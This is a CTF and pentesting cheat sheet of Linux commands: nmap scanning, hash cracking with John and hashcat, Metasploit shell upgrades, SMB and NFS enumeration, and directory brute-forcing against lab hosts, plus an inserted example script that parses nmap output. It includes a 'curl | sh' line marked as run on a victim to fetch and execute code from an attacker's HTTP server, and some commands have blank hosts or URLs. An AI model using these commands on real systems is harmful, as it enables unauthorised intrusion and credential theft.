Linux commands that are often used by hackers, security professionals and CTF players. We will avoid payloads and one-liner exploits (these will be covered on a separate page sometime).

Add Target to hosts file

└─$ echo ' blue.thm' | sudo tee -a /etc/hosts
[sudo] password for abhinav: blue.thm


# TCP scan
sudo nmap -sC -sV -p- -T5 -Pn targethost

# UDP scan
sudo nmap -sU -sV -p- -T5 -Pn targethost

# Store the ports found by the scan as a comma-separated list.
└─$ ports=$(nmap -p- --min-rate=1000 -T4 cronos.htb | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

# Check which ports are found
└─$ echo $ports

# Pass the information in -p argument as $ports
└─$ sudo nmap -sC -sV -A -O -T5 -p$ports cronos.htb
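
The port-list step above, as an added example that is not from the original page: the `grep '^[0-9]'` filter keeps every port line, including filtered ones, and gives an empty `-p` value when nothing is found. The helper names `open_ports` and `valid_port_list` and the sample scan text are constructed for illustration.

```shell
#!/bin/sh
# Added example: build the -p list from open ports only, and validate it.
# open_ports / valid_port_list are hypothetical helper names.

# Read nmap normal output on stdin; print open ports as "22,53,80".
open_ports() {
    awk '
        # Port lines look like "22/tcp  open  ssh"; keep state "open" only.
        $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
            split($1, part, "/")
            list = list sep part[1]
            sep = ","
        }
        END { print list }
    '
}

# Succeed only for a non-empty list of digits separated by single commas.
valid_port_list() {
    case "$1" in
        ''|*[!0-9,]*|,*|*,|*,,*) return 1 ;;
        *) return 0 ;;
    esac
}

# Constructed sample of nmap normal output (not a real scan).
sample_scan='Nmap scan report for target.example
Not shown: 65531 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
53/tcp   open     domain
80/tcp   open     http
8080/tcp filtered http-proxy
Nmap done: 1 IP address (1 host up) scanned'

ports=$(printf '%s\n' "$sample_scan" | open_ports)
if valid_port_list "$ports"; then
    echo "open ports: $ports"
else
    echo "no open ports parsed; not passing an empty -p list" >&2
fi
```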

Start Metasploit with database

Cracking hash with John

└─$ john hash --format=NT --wordlist=/usr/share/wordlists/rockyou.txt 

Cracking hash with hashcat

Windows NTLM Hash

hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt.gz

Metasploit Shell Upgrade to Meterpreter

sessions -u 3
sessions -u -1
use post/multi/manage/shell_to_meterpreter
run session=-1

Extract Files

Gz Files

gunzip archive.gz

tar -xvzf archive.tar.gz

SSH Connection

ssh username@host -oHostKeyAlgorithms=+ssh-dss

Text Filter

grep -i - include (case-insensitive match)
grep -v - exclude (invert match)

SMB Enumeration


nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse
smbclient //IP/directory

Mount NFS

Make a directory locally and mount the share on it

mkdir /mnt/sampleDIR
sudo mount IP:/folder /mnt/sampleDIR


Get version via banner

nc IP port


From github

curl -L | sh

Python Simple HTTP Server

python3 -m http.server 7777
curl | sh #Victim

WordPress CMS Vulnerability Scanning

wpscan --url https://brainfuck.htb --disable-tls-checks

Directory Enumeration

└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://cronos.htb/FUZZ -mc 200,403 -c -t 400

└─$ gobuster dir -u  http://cronos.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --threads 200 --quiet